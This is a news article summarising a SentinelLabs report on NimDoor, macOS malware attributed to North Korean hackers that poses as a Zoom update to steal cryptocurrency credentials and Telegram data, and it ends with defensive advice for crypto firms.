SentinelLabs uncovered a new and alarming cyberattack campaign orchestrated by North Korean hackers, leveraging a novel malware dubbed “NimDoor.” Written in the obscure Nim programming language, this malware disguises itself as a Zoom software update and spreads through Telegram, specifically targeting Web3 and cryptocurrency companies. The campaign, detailed in a SentinelLabs report published on July 2, 2025, showcases the evolving tactics of DPRK-aligned threat actors, exploiting macOS vulnerabilities to steal sensitive data, including cryptocurrency wallet credentials.
The attack begins with a familiar yet insidious social engineering tactic: hackers impersonate trusted contacts on Telegram, luring victims into scheduling a Zoom call via Calendly. Victims receive an email containing a malicious “Zoom SDK update” script, padded with thousands of blank lines to evade detection.
Once executed, the script deploys NimDoor, a multi-stage malware that combines AppleScript, Bash, C++, and Nim-compiled binaries to infiltrate macOS systems. The use of Nim, a cross-platform language rarely seen in malware, allows attackers to create lightweight, hard-to-detect executables that work across macOS, Windows, and Linux without modification.
NimDoor’s sophistication lies in its ability to bypass Apple’s built-in security measures, which do not yet flag this malware. The attack chain includes two primary Mach-O binaries—one in C++ and one in Nim—designed for persistence and data exfiltration.
The malware installs deceptive files like “GoogIe LLC” (using a capital “i” to mimic a lowercase “L”) and “CoreKitAgent,” which uses macOS’s kqueue mechanism and signal-based persistence to reinstall itself if terminated or after a system reboot. Bash scripts named “upl” and “tlgrm” extract sensitive data, including browser credentials, Keychain passwords, and Telegram’s encrypted databases, potentially exposing cryptocurrency wallet keys and private messages.
The campaign, first observed targeting a Web3 startup in April 2025, reflects a broader shift in North Korean cyber tactics. Previously reliant on languages like Go and Rust, DPRK hackers are now leveraging Nim’s unique compile-time execution to create complex binaries that blend developer and runtime code, complicating analysis and detection.
This shows the growing threat to macOS, debunking the myth that Apple devices are immune to viruses. According to TRM Labs, North Korea-linked groups have stolen over $1.6 billion from cryptocurrency firms in the first half of 2025 alone, with NimDoor adding to their arsenal.
SentinelLabs advises crypto firms to block unsigned installer packages, verify Zoom updates only from zoom.us, and audit Telegram contacts for suspicious activity. As cyberattacks grow increasingly sophisticated, no industry or platform is safe, and vigilance remains critical.
